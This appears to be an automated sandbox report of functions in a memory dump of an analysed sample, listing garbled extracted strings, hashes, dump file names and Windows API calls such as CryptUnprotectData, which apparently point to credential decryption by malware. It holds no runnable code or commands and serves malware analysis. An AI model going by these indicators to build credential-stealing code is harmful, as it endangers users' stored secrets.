Function 00FB80BE Relevance: 11.7, Strings: 8, Instructions: 1655COMMON

Download Yara Rule

Strings

:;, xrefs: 00FB8CE9
&Xk~, xrefs: 00FB8E95
@(i, xrefs: 00FB8397
_-uy, xrefs: 00FB899A
!Jv, xrefs: 00FB8E48
%r?', xrefs: 00FB87AC
@(i, xrefs: 00FB83D7
S#?, xrefs: 00FB8EAF

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !Jv$%r?'$&Xk~$@(i$@(i$S#?$_-uy$:;
API String ID: 0-932148867
Opcode ID: 8d7356294ec8527d7395b45559b09412e9c3a4f1a33dc16179c5729a5bb369de
Instruction ID: 162d1f1936c2db6f5f8635c6bb1de895a1341316313668cef8316200ae40e034
Opcode Fuzzy Hash: 8d7356294ec8527d7395b45559b09412e9c3a4f1a33dc16179c5729a5bb369de
Instruction Fuzzy Hash: 39B228F390C2149FD3046E2DDC8567ABBE9EF94720F1A8A3DEAC5C3744EA3558048697

Function 00FAFAB1 Relevance: 10.4, Strings: 7, Instructions: 1638COMMON

Download Yara Rule

Strings

cSv, xrefs: 00FB0CD6
OQ|, xrefs: 00FAFDB4
AF', xrefs: 00FB035F
le^t, xrefs: 00FAFAE4
ijwA, xrefs: 00FB0677
[[_, xrefs: 00FB0BDA
{_, xrefs: 00FB03DF

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: OQ|$AF'$[[_$cSv$ijwA$le^t${_
API String ID: 0-2694270444
Opcode ID: 142329815ea8f3c4c0ed5f57e6bcbabb594d2025519e6be4d9ece4d050e15564
Instruction ID: 902aa63b95a71d4d196d2915ce173e3180b01fb11d1176864fe02a0fb73dddf7
Opcode Fuzzy Hash: 142329815ea8f3c4c0ed5f57e6bcbabb594d2025519e6be4d9ece4d050e15564
Instruction Fuzzy Hash: 0AB239F390C2109FD7046E2DEC9567ABBE9EF94320F1A4A3DEAC5C7344EA7558008796

Function 00FBD27E Relevance: 10.4, Strings: 7, Instructions: 1627COMMON

Download Yara Rule

Strings

1tN, xrefs: 00FBE4EF
K{e, xrefs: 00FBDE40
Ttzv, xrefs: 00FBDB10
I`o, xrefs: 00FBE529
O>}, xrefs: 00FBDAA6
*w>, xrefs: 00FBD65D
k\q^, xrefs: 00FBDC16

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: *w>$1tN$I`o$O>}$Ttzv$k\q^$K{e
API String ID: 0-3280501490
Opcode ID: aff465e36d519e914083a586314bed41eb3cd1a8972ecbc13612d94e991c0ec6
Instruction ID: b4377510ce1e69aca6478ee8514ff4024467c16934b66b0b390f1692062e70eb
Opcode Fuzzy Hash: aff465e36d519e914083a586314bed41eb3cd1a8972ecbc13612d94e991c0ec6
Instruction Fuzzy Hash: ECB21AF3608204AFE304AE2DEC8577AB7E9EF94720F1A493DE6C5C3744E63598058697

Function 00FBED6B Relevance: 9.1, Strings: 6, Instructions: 1625COMMON

Download Yara Rule

Strings

26~w, xrefs: 00FBFAA0
5cK|, xrefs: 00FC011C
;_MU, xrefs: 00FBF853
%8{, xrefs: 00FBFB15
F=, xrefs: 00FBEE91
bsv, xrefs: 00FBF1A4

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %8{$26~w$5cK|$;_MU$F=$bsv
API String ID: 0-530004982
Opcode ID: e12d4baa6076e320ad3c78d53d9824c515ec75c3add11e9ca06478da3510687e
Instruction ID: ee36faada03a72951094575bccef250395f6754d08e8f566bce2ca907e3c8c4a
Opcode Fuzzy Hash: e12d4baa6076e320ad3c78d53d9824c515ec75c3add11e9ca06478da3510687e
Instruction Fuzzy Hash: 3EB215F360C2009FE3086E29EC8567AFBE9EF94320F1A493DE6C5C7344EA7558458697

Function 00BE7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BE724D
RtlAllocateHeap.NTDLL(00000000), ref: 00BE7254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BE7281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BE72A4
LocalFree.KERNEL32(?), ref: 00BE72AE

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: e92c36e31904e8b7d8bccb605ad26f9ac84542916c9df9d24548274aebf1d356
Instruction ID: 23adcd354e353b29a62acc4e137bc10e76f783875a7e839e2274335370561ef2
Opcode Fuzzy Hash: e92c36e31904e8b7d8bccb605ad26f9ac84542916c9df9d24548274aebf1d356
Instruction Fuzzy Hash: 8F0100B5A40208BFDB24DBD5DD4AF9D77B8EB44700F144155FB05BA2C0DBB0AA058B65

Function 00FB4B75 Relevance: 6.6, Strings: 4, Instructions: 1635COMMON

Download Yara Rule

Strings

0kz, xrefs: 00FB56E0
;O{, xrefs: 00FB5145
OGm|, xrefs: 00FB4D5D
9F1i, xrefs: 00FB4C27

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0kz$9F1i$;O{$OGm|
API String ID: 0-2561781408
Opcode ID: 91cbbd6e83b9ebdfaf3af4dab69cffc9bc46425307f0defdf8d91c9fde967dfe
Instruction ID: b9006f76fde21508e271b915bbbfc3a7369125d9f5210e6cf9496b22dae9619d
Opcode Fuzzy Hash: 91cbbd6e83b9ebdfaf3af4dab69cffc9bc46425307f0defdf8d91c9fde967dfe
Instruction Fuzzy Hash: 39B216F3A0C2049FE304AE2DEC8567ABBE9EF94720F1A493DE6C5C7744E63558018697

Function 00BF8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00BE5184,40000001,00000000,00000000,?,00BE5184), ref: 00BF8EC0

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: ab96b1a896bc1c229a0ea465c865443646ad620fd6ae217a484148eab6177b98
Instruction ID: 5fd4cd35aca43cc73379100f870ccbcdea65da1c3c28e93f10346724c7750be4
Opcode Fuzzy Hash: ab96b1a896bc1c229a0ea465c865443646ad620fd6ae217a484148eab6177b98
Instruction Fuzzy Hash: F4110670200208AFDB04CF65D889FBA33E9EF89700F149898FA198B250DB75E849DB60

Function 00BE9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
